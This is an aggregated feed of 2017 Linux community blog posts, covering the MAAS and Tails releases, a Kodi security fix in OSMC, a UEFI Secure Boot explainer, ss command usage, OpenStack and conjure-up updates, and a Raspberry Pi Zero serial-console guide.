May 25, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Andres Rodriguez: MAAS 2.2.0 Released!

I’m happy to announce that MAAS 2.2.0 (final) has now been released, and it introduces quite a few exciting features:

  • MAAS Pods – Ability to dynamically create a machine on demand. This is reflected in MAAS’ support for Intel Rack Scale Design.
  • Hardware Testing
  • DHCP Relay Support
  • Unmanaged Subnets
  • Switch discovery and deployment on Facebook’s Wedge 40 & 100.
  • Various improvements and minor features.
  • MAAS Client Library
  • Intel Rack Scale Design support.

For more information, please read the release notes are available here.

MAAS 2.2.0 is currently available in the following MAAS team PPA.
Please note that MAAS 2.2 will replace the MAAS 2.1 series, which will go out of support. We are holding MAAS 2.2 in the above PPA for a week, to provide enough notice to users that it will replace 2.1 series. In the following weeks, MAAS 2.2 will be backported into Ubuntu Xenial.

25 May, 2017 01:47PM

hackergotchi for Grml developers

Grml developers

Michael Prokop: The #newinstretch game: new forensic packages in Debian/stretch

Repeating what I did for the last Debian releases with the #newinwheezy and #newinjessie games it’s time for the #newinstretch game:

Debian/stretch AKA Debian 9.0 will include a bunch of packages for people interested in digital forensics. The packages maintained within the Debian Forensics team which are new in the Debian/stretch release as compared to Debian/jessie (and ignoring jessie-backports):

  • bruteforce-salted-openssl: try to find the passphrase for files encrypted with OpenSSL
  • cewl: custom word list generator
  • dfdatetime/python-dfdatetime: Digital Forensics date and time library
  • dfvfs/python-dfvfs: Digital Forensics Virtual File System
  • dfwinreg: Digital Forensics Windows Registry library
  • dislocker: read/write encrypted BitLocker volumes
  • forensics-all: Debian Forensics Environment – essential components (metapackage)
  • forensics-colorize: show differences between files using color graphics
  • forensics-extra: Forensics Environment – extra console components (metapackage)
  • hashdeep: recursively compute hashsums or piecewise hashings
  • hashrat: hashing tool supporting several hashes and recursivity
  • libesedb(-utils): Extensible Storage Engine DB access library
  • libevt(-utils): Windows Event Log (EVT) format access library
  • libevtx(-utils): Windows XML Event Log format access library
  • libfsntfs(-utils): NTFS access library
  • libfvde(-utils): FileVault Drive Encryption access library
  • libfwnt: Windows NT data type library
  • libfwsi: Windows Shell Item format access library
  • liblnk(-utils): Windows Shortcut File format access library
  • libmsiecf(-utils): Microsoft Internet Explorer Cache File access library
  • libolecf(-utils): OLE2 Compound File format access library
  • libqcow(-utils): QEMU Copy-On-Write image format access library
  • libregf(-utils): Windows NT Registry File (REGF) format access library
  • libscca(-utils): Windows Prefetch File access library
  • libsigscan(-utils): binary signature scanning library
  • libsmdev(-utils): storage media device access library
  • libsmraw(-utils): split RAW image format access library
  • libvhdi(-utils): Virtual Hard Disk image format access library
  • libvmdk(-utils): VMWare Virtual Disk format access library
  • libvshadow(-utils): Volume Shadow Snapshot format access library
  • libvslvm(-utils): Linux LVM volume system format access librar
  • plaso: super timeline all the things
  • pompem: Exploit and Vulnerability Finder
  • pytsk/python-tsk: Python Bindings for The Sleuth Kit
  • rekall(-core): memory analysis and incident response framework
  • unhide.rb: Forensic tool to find processes hidden by rootkits (was already present in wheezy but missing in jessie, available via jessie-backports though)
  • winregfs: Windows registry FUSE filesystem

Join the #newinstretch game and present packages and features which are new in Debian/stretch.

25 May, 2017 07:48AM

hackergotchi for OSMC


OSMC Security Update for OSMC 2017.04-1 and earlier

Platforms affected:

  • OSMC for Raspberry Pi (all models)
  • OSMC for Apple TV
  • OSMC for Vero (all models)

A vulnerability [1] which could allow remote code execution when downloading subtitles from a remote server has been identified in Kodi. This vulnerability is considered critical.

This vulnerability has been fixed in Kodi and we have now included this in OSMC for all supported platforms.

We recommend you update your device immediately. This can be done by going to My OSMC -> Updates -> Check for Updates. After updating, your system should report OSMC 2017.04-2 as the version in My OSMC.

Although OSMC has a monthly update cycle, OSMC makes critical bug fixes and fixes for security vulnerabilities immediately available. You can learn more about OSMC's update cycle and about keeping your system up to date here.

We plan to release our May update this Sunday, with a variety of performance improvements, feature improvements and bug fixes. However we did not want to wait until this time to release an important security fix.

OSMC would like to thank the Check Point Research Team for responsible disclosure of the vulnerability.

[1] CVE-2016-2118

25 May, 2017 01:00AM by Sam Nazarko

May 24, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Mathieu Trudel: An overview of UEFI Secure Boot on Ubuntu

Secure Boot is here

Ubuntu has now supported UEFI booting and Secure Boot for long enough that it is available, and reasonably up to date, on all supported releases. Here is how Secure Boot works.

An overview

I'm including a diagram here; I know it's a little complicated, so I will also explain how things happen (it can be clicked to get to the full size image).

In all cases, booting a system in UEFI mode loads UEFI firmware, which typically contains pre-loaded keys (at least, on x86). These keys are usually those from Microsoft so that Windows can load its own bootloader and verify it, as well as those from the computer manufacturer. The firmware doesn't, by itself, know anything special about how to boot the system -- this is something that is informed by NVRAM (or some similar memory that survives a reboot) by way of a few variables: BootOrder, which specified what order to boot things in, as well as BootEntry#### (hex numbers), which contains the path to the EFI image to load, a disk, or some other method of starting the computer (such as booting in the Setup tool for that firmware). If no BootEntry variable listed in BootOrder gets the system booting, then nothing would happen. Systems however will usually at least include a path to a disk as a permanent or default BootEntry. Shim relies on that, or on a distro, to load in the first place.

Once we actually find shim to boot; this will try to validate signatures of the next piece in the puzzle: grub2, MokManager, or fallback, depending on the state of shim's own variables in NVRAM; more on this later.

In the usual scenario, shim will validate the grub2 image successfully, then grub2 itself will try to load the kernel or chainload another EFI binary, after attempting to validate the signatures on these images by way of asking shim to check the signature.


Shim is just a very simple layer that holds on to keys outside of those installed by default on the system (since they normally can't be changed outside of Setup Mode, and require a few steps to do), and knows how to load grub2 in the normal case, as well as how to load MokManager if policy changes need to be applied (such as disabling signature validation or adding new keys), as well as knowing how to load the fallback binary which can re-create BootEntry variables in case the firmware isn't able to handle them. I will expand on MokManager and fallback in a future blog post.

Your diagram says shim is signed by Microsoft, what's up with that?

Indeed, shim is an EFI binary that is signed by Microsoft how we ship it in Ubuntu. Other distributions do the same. This is required because the firmware on most systems already contains Microsoft certificates (pre-loaded in the factory), and it would be impractical to have different shims for each manufacturer of hardware. All EFI binaries can be easily re-signed anyway, we just do things like this to make it as easy as possible for the largest number of people.

One thing this means is that uploads of shim require a lot of effort and testing. Fortunately, since it is used by other distributions too, it is a well-tested piece of code. There is even now a community process to handle review of submissions for signature by Microsoft, in an effort to catch anything outlandish as quickly and as early as possible.

Why reboot once a policy change is made or boot entries are rebuilt?

All of this happens through changes in firmware variables. Rebooting makes sure we can properly take into account changes in the firmware variables, and possibly carry on with other "backlogged" actions that need to happen (for instance, rebuilding BootEntry variables first, and then loading MokManager to add a new signing key before we can load a new grub2 image you signed yourself).


grub2 is not a new piece of the boot process in any way. It's been around for a long while. The difference from booting in BIOS mode compared to in UEFI is that we install an UEFI binary version of grub2. The software is the same, just packaged slightly differently (I may outline the UEFI binary format at some point in the future). It also goes through some code paths that are specific to UEFI, such as checking if we've booting through shim, and if so, asking it to validate signatures. If not, we can still validate signatures, but we would have to do so using the UEFI protocol itself, which is limited to allowing signatures by keys that are included in the firmware, as expressed earlier. Mostly just the Microsoft signatures.

grub2 in UEFI otherwise works just like it would elsewhere: it try to find its grub.cfg configuration file, and follow its instructions to boot the kernel and load the initramfs.

When Secure Boot is enabled, loading the kernel normally requires that the kernel itself is signed. The kernels we install in Ubuntu are signed by Canonical, just like grub2 is, and shim knows about the signing key and can validate these signatures.

At the time of this writing, if the kernel isn't signed or is signed by a key that isn't known, grub2 will fall back to loading the kernel as a normal binary (as in not signed), outside of BootServices (a special mode we're in while booting the system, normally it's exited by the kernel early on as the kernel loads). Exiting BootServices means some special features of the firmware are not available to anything that runs afterwards, so that while things may have been loaded in UEFI mode, they will not have access to everything in firmware. If the kernel is signed correctly, then grub2 leaves the ExitBootServices call to be done by the kernel.

Very soon, we will stop allowing to load unsigned (or signed by unknown keys) kernels in Ubuntu. This is work in progress. This change will not affect most users, only those who build their own kernels. In this case, they will still be able to load kernels by making sure they are signed by some key (such as their own, and I will cover signing things in my next blog entry), and importing that key in shim (which is a step you only need to do once).

The kernel

In UEFI, the kernel enforces that modules loaded are properly signed. This means that for those who need to build their own custom modules, or use DKMS modules (virtualbox, r8168, bbswitch, etc.), you need to take more steps to let the modules load properly.

In order to make this as easy as possible for people, for now we've opted to let users disable Secure Boot validation in shim via a semi-automatic process. Shim is still being verified by the system firmware, but any piece following it that asks shim to validate something will get an affirmative response (ie. things are valid, even if not signed or signed by an unknown key). grub2 will happily load your kernel, and your kernel will be happy to load custom modules. This is obviously not a perfectly secure solution, more of a temporary measure to allow things to carry on as they did before. In the future, we'll replace this with a wizard-type tool to let users sign their own modules easily. For now, signature of binaries and modules is a manual process (as above, I will expand on it in a future blog entry).

Shim validation

To toggle shim validation, if you were using DKMS packages and feel you'd really prefer to have shim validate everything (but be aware that if your system requires these drivers, they will not load and your system may be unusable, or at least whatever needs that driver will not work):
sudo update-secureboot-policy --enable
If nothing happens, it's because you already have shim validation enabled: nothing has required that it be disabled. If things aren't as they should be (for instance, Secure Boot is not enabled on the system), the command will tell you.

And although we certainly don't recommend it, you can disable shim validation yourself with much the same command (see --help). There is an example of use of update-secureboot-policy here.

24 May, 2017 08:07PM by Mathieu Trudel-Lapierre (

Ubuntu Insights: Redefining the Developer Event

By Randall Ross, Ubuntu Evangelist

We’ve all been to “those other” developer events: Sitting in a room watching a succession of never-ending slide presentations. Engagement with the audience, if any, is minimal. We leave with some tips and tools that we might be able to put into practice, but frankly, we attended because we were supposed to. The highlight was actually the opportunity to connect with industry contacts.

Key members of the OpenPOWER Foundation envisioned something completely different in their quest to create the perfect developer event, something that has never been done before: What if developers at a developer event actually spent their time developing?

The OpenPOWER Foundation is an open technical membership organization that enables its member companies to provide customized, innovative solutions based on POWER CPU processors and system platforms that encourage data centers to rethink their approach to technology. The Foundation found that ISVs needed support and encouragement to develop OpenPOWER-based solutions and take advantage of other OpenPOWER Ready components. The demand for OpenPOWER solutions has been growing, and ISVs needed a place to get started.

To solve this challenge, The OpenPOWER Foundation created the first ever Developer Congress, a hands-on event that will take place May 22-25 in San Francisco. The Congress will focus on all aspects of full stack solutions — software, hardware, infrastructure, and tooling — and developers will have the opportunity to learn and develop solutions amongst peers in a collaborative and supportive environment.

The Developer Congress will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. Experts in the latest hot technologies such as deep learning, machine learning, artificial intelligence, databases and analytics, and cloud will be on hand to provide one-on-one advice as needed.

As Event Co-Chair, I had an idea for a different type of event. One where developers are treated as “heroes” (because they are — they are the creators of solutions). My Event Co-Chair Greg Phillips, OpenPOWER Content Marketing Manager at IBM, envisioned an event where developers will bring their laptops and get their hands dirty, working under the tutelage of technical experts to create accelerated solutions.

The OpenPOWER Developer Congress is designed to provide a forum that encourages learning from peers and networking with industry thought leaders. Its format emphasises collaboration with partners to find complementary technologies, and provides on-site mentoring through liaisons assigned to help developers get the most out of their experience.

Support from the OpenPOWER Foundation doesn’t end with the Developer Congress. The OpenPOWER Foundation is dedicated to providing its members with ongoing support in the form of information, access to developer tools and software labs across the globe, and assets for developing on OpenPOWER.

The OpenPOWER Foundation is committed to making an investment in the Developer Congress to provide an expert-rich environment that allows attendees to walk away three days later with new skills, new tools, and new relationships. As Thomas Edison said, “Opportunity is missed by most people because it is dressed in overalls and looks like work.” So developers, come get your hands dirty.

Learn more about the OpenPOWER Developer Congress.

About the author

Randall Ross leads the OpenPOWER Ambassadors, and is a prominent Ubuntu community member. He hails from Vancouver BC, where he leads one of the largest groups of Ubuntu enthusiasts and contributors in the world.

24 May, 2017 12:59PM

Mathieu Trudel: ss: another way to get socket statistics

In my last blog post I mentioned ss, another tool that comes with the iproute2 package and allows you to query statistics about sockets. The same thing that can be done with netstat, with the added benefit that it is typically a little bit faster, and shorter to type.

Just ss by default will display much the same thing as netstat, and can be similarly passed options to limit the output to just what you want. For instance:

$ ss -t
State       Recv-Q Send-Q       Local Address:Port                        Peer Address:Port              
ESTAB       0      0                               
ESTAB       0      0                              
ESTAB       0      0             

ss -t shows just TCP connections. ss -u can be used to show UDP connections, -l will show only listening ports, and things can be further filtered to just the information you want.

I have not tested all the possible options, but you can even forcibly close sockets with -K.

One place where ss really shines though is in its filtering capabilities. Let's list all connections with a source port of 22 (ssh):

$ ss state all sport = :ssh
Netid State      Recv-Q Send-Q     Local Address:Port                      Peer Address:Port              
tcp   LISTEN     0      128                    *:ssh                                  *:*                  
tcp   ESTAB      0      0                          
tcp   LISTEN     0      128                   :::ssh                                 :::* 
And if I want to show only connected sockets (everything but listening or closed):

$ ss state connected sport = :ssh
Netid State      Recv-Q Send-Q     Local Address:Port                      Peer Address:Port              
tcp   ESTAB      0      0             

Similarly, you can have it list all connections to a specific host or range; in this case, using the subnet, which apparently belongs to Google:

$ ss state all dst
Netid State      Recv-Q Send-Q     Local Address:Port                      Peer Address:Port              
tcp   ESTAB      0      0                       
tcp   ESTAB      0      0                        
tcp   ESTAB      0      0         
This is very much the same syntax as for iptables, so if you're familiar with that already, it will be quite easy to pick up. You can also install the iproute2-doc package, and look in /usr/share/doc/iproute2-doc/ss.html for the full documentation.

Try it for yourself! You'll see how well it works. If anything, I'm glad for the fewer characters this makes me type.

24 May, 2017 12:54AM by Mathieu Trudel-Lapierre (

May 23, 2017

Ubuntu Insights: Hacking Through Machine Learning at the OpenPOWER Developer Congress

By Sumit Gupta, Vice President, IBM Cognitive Systems

10 years ago, every CEO leaned over to his or her CIO and CTO and said, “we got to figure out big data.” Five years ago, they leaned over and said, “we got to figure out cloud.” This year, every CEO is asking their team to figure out “AI” or artificial intelligence.

IBM laid out an accelerated computing future several years ago as part of our OpenPOWER initiative. This accelerated computing architecture has now become the foundation of modern AI and machine learning workloads such as deep learning. Deep learning is so compute intensive that despite using several GPUs in a single server, one computation run of deep learning software can take days, if not weeks, to run.

The OpenPOWER architecture thrives on this kind of compute intensity. The POWER processor has much higher compute density than x86 CPUs (there are up to 192 virtual cores per CPU socket in Power8). This density per core, combined with high-speed accelerator interfaces like NVLINK and CAPI that optimize GPU pairing, provides an exponential performance benefit. And the broad OpenPOWER Linux ecosystem, with 300+ members, means that you can run these high-performance POWER-based systems in your existing data center either on-prem or from your favorite POWER cloud provider at costs that are comparable to legacy x86 architectures.

Take a Hack at the Machine Learning Work Group

The recently formed OpenPOWER Machine Learning Work Group gathers experts in the field to focus on the challenges that machine learning developers are continuously facing. Participants identify use cases, define requirements, and collaborate on solution architecture optimisations. By gathering in a workgroup with a laser focus, people from diverse organisations can better understand and engineer solutions that address similar needs and pain points.

The OpenPOWER Foundation pursues technical solutions using POWER architecture from a variety of member-run work groups. The Machine Learning Work Group is a great example of how hardware and software can be leveraged and optimized across solutions that span the OpenPOWER ecosystem.

Accelerate Your Machine Learning Solution at the Developer Congress

This spring, the OpenPOWER Foundation will host the OpenPOWER Developer Congress, a “get your hands dirty” event on May 22-25 in San Francisco. This unique event provides developers the opportunity to create and advance OpenPOWER-based solutions by taking advantage of on-site mentoring, learning from peers, and networking with developers, technical experts, and industry thought leaders. If you are a developer working on Machine Learning solutions that employ the POWER architecture, this event is for you.

The Congress is focused full stack solutions — software, firmware, hardware infrastructure, and tooling. It’s a hands-on opportunity to ideate, learn, and develop solutions in a collaborative and supportive environment. At the end of the Congress, you will have a significant head start on developing new solutions that utilize OpenPOWER technologies and incorporate OpenPOWER Ready products.

There has never been another event like this one. It’s a developer conference devoted to developing, not sitting through slideware presentations or sales pitches. Industry experts from the top companies that are innovating in deep learning, machine learning, and artificial intelligence will be on hand for networking, mentoring, and providing advice.

A Developer Congress Agenda Specific to Machine Learning

The OpenPOWER Developer Congress agenda addresses a variety of Machine Learning topics. For example, you can participate in hands-on VisionBrain training, learning a new model and generating the API for image classification, using your own family pictures to train the model. The current agenda includes:

• VisionBrain: Deep Learning Development Platform for Computer Vision
• GPU Programming Training, including OpenACC and CUDA
• Inference System for Deep Learning
• Intro to Machine Learning / Deep Learning
• Develop / Port / Optimize on Power Systems and GPUs
• Advanced Optimization
• Spark on Power for Data Science
• Openstack and Database as a Service
• OpenBMC

Bring Your Laptop and Your Best Ideas

The OpenPOWER Developer Congress will take place May 22-25 in San Francisco. The event will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. So bring your laptop and preferred development tools and prepare to get your hands dirty!

About the author

Sumit Gupta is Vice President, IBM Cognitive Systems, where he leads the product and business strategy for HPC, AI, and Analytics. Sumit joined IBM two years ago from NVIDIA, where he led the GPU accelerator business.

23 May, 2017 09:31AM

Marco Trevisan (Treviño): Ubuntu goes GNOME, theming stays. Let’s test (and tune) it!

Hi guys! Again… Long time, no see you :-).

As you surely know, in the past weeks Ubuntu took the hard decision of stopping the development of Unity desktop environment, focusing again in shipping GNOME as default DE, and joining the upstream efforts.

While, in a personal note, after more than 6 years of involvement in the Unity development, this is a little heartbreaking, I also think that given the situation this is the right decision, and I’m quite excited to be able to work even closer to the whole opensource community!

Most of the aspects of the future Ubuntu desktop have to be defined yet, and I guess you know that there’s a survey going on I encourage you to participate in order to make your voice count…

One important aspect of this, is the visual appearance, and the Ubuntu Desktop team has decided that the default themes for Ubuntu 17.10 will continue to be the ones you always loved! Right now some work is being done to make sure Ambiance and Radiance look and work good in GNOME Shell.

In the past days I’ve released a  new version of ‘light-themes‘ to fix several theming problems in GNOME Shell.

This is already quite an improvement, but we can’t fix bugs we don’t know about… So this is where you can help make Ubuntu better!

Get Started

If you haven’t already, here’s how I recommend you get started.
Install the latest Ubuntu 17.10 daily image (if not going wild and trying this in 17.04).
After installing it, install gnome-shell.
Install gnome-tweak-tool if you want an easy way to change themes.
On the login screen, switch your session to GNOME and log in.

Report Bugs

Run this command to report bugs with Ambiance or Radiance:

ubuntu-bug light-themes

Attach a screenshot to the Launchpad issue.

Other info

Ubuntu’s default icon theme is ubuntu-mono-dark (or -light if you switch to Radiance) but most of Ubuntu’s customized icons are provided by humanity-icon-theme.

Helping with Themes development

If you want to help with the theming itself, you’re very welcome. Gtk themes are nowadays using CSS, so I’m pretty sure that any Web designer out there can help with them (these are the supported properties).

All you have to do, is simply use the Gtk Inspector that can be launched from any Gtk3 app, and write some CSS rules and see how they get applied on the fly. Once you’re happy with your solution, you can just create a MP for the Ubuntu Themes.

Let’s keep ubuntu, look ubuntu!

PS: thanks to Jeremy Bicha for the help in this post.

23 May, 2017 05:20AM

Aaron Honeycutt: Current Layout: Kubuntu 17.10 – 5/22/17

I’ve been running Artful aka 17.10 on my laptop for maybe a month now with no real issues and thats thanks to the awesome Kubuntu developers we have and our testers!


My Current layout has Latte Dock running with a normal panel (yes a bit Mac-y I know). I had to build Latte Dock for myself in Launchpad[1] so if you want to use it on 17.10 with the normal PPA/testing warning, I also have it built for 17.04 if anyone wants that as well[2]. I’m also running the new Qt music player Babe-Qt.

I also have the Uptime widget and a launcher widget in the Latte Dock as it can hold widgets just like a normal panel. Oh and the wallpaper is from awesome game Firewatch (it’s on Linux!)


23 May, 2017 03:40AM

May 22, 2017

Adam Stokes: conjure-up dev summary for week 20

conjure-up dev summary for week 20

conjure-up dev summary for week 20 conjure-up dev summary for week 20 conjure-up dev summary for week 20

This week we concentrated on polishing up our region and credentials selection capabilities.

Initially, we wanted people deploying big software as fast as possible without it turning into a "choose your own adventure" book. This has been hugely successful as it minimized time and effort to getting to that end result of a usable Kubernetes or OpenStack.

Now fast forward a few months and feature requests were coming in wanting to expand on this basic flow of installing big software. Our first request was to add the ability to specify regions where this software would live, that feature is complete and is known as region selections:

Region Selections

Region selection is supported in both Juju as a Service (JAAS) and as a self hosted controller.

conjure-up dev summary for week 20

In this example we are using JAAS to deploy Canonical Distribution of Kubernetes to the us-east-2 region in AWS:

conjure-up dev summary for week 20

conjure-up will already know what regions are available and will prompt you with that list:

conjure-up dev summary for week 20

Finally, input your credentials and off it goes to having a fully usable Kubernetes cluster in AWS.

conjure-up dev summary for week 20

The credentials view leads us into our second completed feature. Multiple user credentials are supported for all the various clouds and previously conjure-up tried to do the right thing if an existing credential for a cloud was found. Again, in the interest of getting you up and running as fast as possible conjure-up would re-use any credentials it found for the cloud in use. This worked well initially, however, as usage increased so did the need for being able to choose from a list of existing credentials or create your own. That feature work has been completed and will be available in conjure-up 2.2.

Credential Selection

This screen shows you a list of existing credentials that were created for AWS or gives you the option of creating additional ones:

conjure-up dev summary for week 20

Trying out the latest

As always we keep our edge releases current with the latest from our code. If you want to help test out these new features simply run:

sudo snap install conjure-up --classic --edge  

That's all for this week, check back next week for more conjure-up news!

22 May, 2017 04:19PM

James Page: Ubuntu OpenStack Dev Summary – 22nd May 2017

Welcome to the first ever Ubuntu OpenStack development summary!

This summary is intended to be a regular communication of activities and plans happening in and around Ubuntu OpenStack, covering but not limited to the distribution and deployment of OpenStack on Ubuntu.

If there is something that you would like to see covered in future summaries, or you have general feedback on content please feel free to reach out to me (jamespage on Freenode IRC) or any of the OpenStack Engineering team at Canonical!

OpenStack Distribution

Stable Releases

Ceph 10.2.7 for Xenial, Yakkety, Zesty and Trusty-Mitaka UCA:

Open vSwitch updates (2.5.2 and 2.6.1) for Xenial and Yakkety plus associated UCA pockets:

Point releases for Horizon (9.1.2) and Keystone (9.3.0) for Xenial and Trusty-Mitaka UCA:

And the current set of OpenStack Newton point releases have just entered testing:

Development Release

OpenStack Pike b1 is available in Xenial-Pike UCA (working through proposed testing in Artful).

Open vSwitch 2.7.0 is available in Artful and Xenial-Pike UCA.

Expect some focus on development previews for Ceph Luminous (the next stable release) for Artful and the Xenial-Pike UCA in the next month.

OpenStack Snaps

Progress on producing snap packages for OpenStack components continues; snaps for glance, keystone, nova, neutron and nova-hypervisor are available in the snap store in the edge channel – for example:

sudo snap install --edge --classic keystone

Snaps are currently Ocata aligned; once the team have a set of snaps that we’re all comfortable are a good base, we’ll be working towards publication of snaps across tracks for OpenStack Ocata and OpenStack Pike as well as expanding the scope of projects covered with snap packages.

The edge channel for each track will contain the tip of the associated branch for each OpenStack project, with the beta, candidate and release channels being reserved for released versions. These three channels will be used to drive the CI process for validation of snap updates. This should result in an experience something like:

sudo snap install --classic --channel=ocata/stable keystone


sudo snap install --classic --channel=pike/edge keystone

As the snaps mature, the team will be focusing on enabling deployment of OpenStack using snaps in the OpenStack Charms (which will support CI/CD testing) and migration from deb based installs to snap based installs.

Nova LXD

Support for different Cinder block device backends for Nova-LXD has landed into driver (and the supporting os-brick library), allowing Ceph Cinder storage backends to be used with LXD containers; this is available in the Pike development release only.

Work on support for new LXD features to allow multiple storage backends to be used is currently in-flight, allowing the driver to use dedicated storage for its LXD instances alongside any use of LXD via other tools on the same servers.

OpenStack Charms

6 monthly release cycle

The OpenStack Charms project is moving to a 6 monthly release cadence (rather than the 3 month cadence we’ve followed for the last few years); This reflects the reduced rate of new features across OpenStack and the charms, and the improved process for backporting fixes to the stable charm set between releases. The next charm release will be in August, aligned with the release of OpenStack Pike and the Xenial Pike UCA.

If you have bugs that you’d like to see backported to the current stable charm set, please tag them with the ‘stable-backport’ tag (and they will pop-up in the right place in Launchpad) – you can see the current stable bug pipeline here.

Ubuntu Artful and OpenStack Pike Support

Required changes into the OpenStack Charms to support deployment of Ubuntu Artful (the current development release) and OpenStack Pike are landing into the development branches for all charms, alongside the release of Pike b1 into Artful and the Xenial-Pike UCA.

You can consume these charms (as always) via the ~openstack-charmers-next team, for example:

juju deploy cs:~openstack-charmers-next/keystone

IRC (and meetings)

You can participate in the OpenStack charm development and discussion by joining the #openstack-charms channel on Freenode IRC; we also have a weekly development meeting in #openstack-meeting-4 at either 1000 UTC (odd weeks) or 1700 UTC (even weeks) – see for more details.


22 May, 2017 11:00AM

May 21, 2017

Costales: Ubuntu y otras hierbas S01E02: GNOME3 y UBPorts [podcast] [spanish]

Segundo capítulo del podcast Ubuntu y otras hierbas.

En esta ocasión:
Charlaremos sobre estos temas:
  • Migración a GNOME 3
  • UBPorts mantendrá Unity y Ubuntu Phone
El podcast está disponible para escuchar en:

Podcast en Youtube

Links relacionados al podcast:
Banda sonora del podcast bajo licencia CC BY-NC 4.0.
Vídeo de Marius en la Ubucon sobre UBPorts.

Todos los capítulos del podcast 'Ubuntu y otras hierbas' disponibles aquí.

21 May, 2017 11:50AM by Marcos Costales (

hackergotchi for Tails


Call for testing: 3.0~rc1

You can help Tails! The first release candidate for the upcoming version 3.0 is out. We are very excited and cannot wait to hear what you think about it :)

What's new in 3.0~rc1?

Tails 3.0 will be the first version of Tails based on Debian 9 (Stretch). As such, it upgrades essentially all included software.

Changes since Tails 3.0~beta4 include:

  • Important security fixes!

  • Upgrade to current Debian 9 (Stretch).

  • Upgrade tor to

  • Upgrade Tor Browser to 7.0a4.

  • Migrate from Icedove to Thunderbird (only cosmetic).

Technical details of all the changes are listed in the Changelog.

How to test Tails 3.0~rc1?

We will provide security updates for Tails 3.0~rc1, just like we do for stable versions of Tails.

But keep in mind that this is a test image. We tested that it is not broken in obvious ways, but it might still contain undiscovered issues.

But test wildly!

If you find anything that is not working as it should, please report to us on

Bonus points if you first check if it is a known issue of this release or a longstanding known issue.

Get Tails 3.0~rc1

To upgrade, an automatic upgrade is available from 3.0~beta4 to 3.0~rc1.

If you cannot do an automatic upgrade, you can install 3.0~rc1 by following our usual installation instructions, skipping the Download and verify step.

Tails 3.0~rc1 ISO image OpenPGP signature
Tails 3.0~rc1 torrent

Known issues in 3.0~rc1

  • The documentation has only been partially updated so far.

  • The graphical interface fails to start on some Intel graphics adapters. If this happens to you:

    1. Add the xorg-driver=intel option in the boot menu.
    2. If this fixes the problem, report to to the output of the following commands:

      lspci -v
      lspci -mn

      … so we get the identifier of your graphics adapter and can have this fix applied automatically in the next Tails 3.0 pre-release.

    3. If this does not fix the problem, try Troubleshooting Mode and report the problem to Include the exact model of your Intel graphics adapter.
  • There is no Read-Only feature for the persistent volume anymore; it is not clear yet whether it will be re-introduced in time for Tails 3.0 final (#12093).

  • The persistent Tor Browser bookmarks feature is broken if you enable it for the first time in Tails 3.0~rc1; any persistent bookmarks from before will still work.

    You can workaround this as follows, after you start Tails the first time with Browser bookmarks persistence enabled:

    1. Start Tor Browser and let it load
    2. Close Tor Browser
    3. Run this in a Terminal:

      cp /home/amnesia/.tor-browser/profile.default/places.sqlite \
      rm /home/amnesia/.tor-browser/profile.default/places.sqlite*
      ln -s /home/amnesia/.mozilla/firefox/bookmarks/places.sqlite \
  • Thunderbird email client fails to load for some users. You can fix this by creating a file called .migrated in the folder of your Thunderbird profile. To do so, run this command in a Terminal:

    touch /home/amnesia/.thunderbird/profile.default/.migrated
  • Open tickets for Tails 3.0~rc1

  • Open tickets for Tails 3.0

  • Longstanding known issues

What's coming up?

We will likely publish the first release candidate for Tails 3.0 around May 19.

Tails 3.0 is scheduled for June 13.

Have a look at our roadmap to see where we are heading to.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

21 May, 2017 10:34AM

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Pi Zero as a Serial Gadget

I just got a new Raspberry Pi Zero W (the wireless version) and didn’t feel like hooking it up to a monitor and keyboard to get started. I really just wanted a serial console for starters. Rather than solder in a header, I wanted to be really lazy, so decided to use the USB OTG support of the Pi Zero to provide a console over USB. It’s pretty straightforward, actually.

Install Raspbian on MicroSD

First off is a straightforward “install” of Raspbian on your MicroSD card. In my case, I used dd to image the img file from Raspbian to a MicroSD card in a card reader.

dd if=/home/david/Downloads/2017-04-10-raspbian-jessie-lite.img of=/dev/sde bs=1M conv=fdatasync

Mount the /boot partition

You’ll want to mount the boot partition to make a couple of changes. Before doing so, run partprobe to re-read the partition tables (or unplug and replug the SD card). Then mount the partition somewhere convenient.

mount /dev/sde1 /mnt/boot

Edit /boot/config.txt

To use the USB port as an OTG port, you’ll need to enable the dwc2 device tree overlay. This is accomplished by adding a line to /boot/config.txt with dtoverlay=dwc2.

vim /mnt/boot/config.txt
(append dtoverlay=dwc2)

Edit /boot/cmdline.txt

Now we’ll need to tell the kernel to load the right module for the serial OTG support. Open /boot/cmdline.txt, and after rootwait, add modules-load=dwc2,g_serial.

vim /mnt/boot/cmdline.txt
(insert modules-load=dwc2,g_serial after rootwait)

When you save the file, make sure it is all one line, if you have any line wrapping options they may have inserted newlines into the file.

Mount the root (/) partition

Let’s switch the partition we’re dealing with.

umount /mnt/boot
mount /dev/sde2 /mnt/root

Enable a Console on /dev/ttyGS0

/dev/ttyGS0 is the serial port on the USB gadget interface. While we’ll get a serial port, we won’t have a console on it unless we tell systemd to start a getty (the process that handles login and starts shells) on the USB serial port. This is as simple as creating a symlink:

ln -s /lib/systemd/system/getty@.service /mnt/root/etc/systemd/system/

This asks systemd to start a getty on ttyGS0 on boot.

Unmount and boot your Pi Zero

Unmount your SD card, insert the micro SD card into a Pi Zero, and boot with a Micro USB cable between your computer and the OTG port.

Connect via a terminal emulator

You can connect via the terminal emulator of your choice at 115200bps. The Pi Zero shows up as a “Netchip Technology, Inc. Linux-USB Serial Gadget (CDC ACM mode)”, which means that (on Linux) your device will typically be /dev/ttyACM0.

screen /dev/ttyACM0 115200


This is a quick way to get a console on a Raspberry Pi Zero, but it has downsides:

  • Provides only console, no networking.
  • File transfers are “difficult”.

21 May, 2017 07:00AM

May 20, 2017

hackergotchi for VyOS


VyOS 1.2.0 repository re-structuring

In preparation for the new 1.2.0 (jessie-based) beta release, we are re-populating the package repositories. The old repositories are now archived, you still can find then in the /legacy/repos directory on

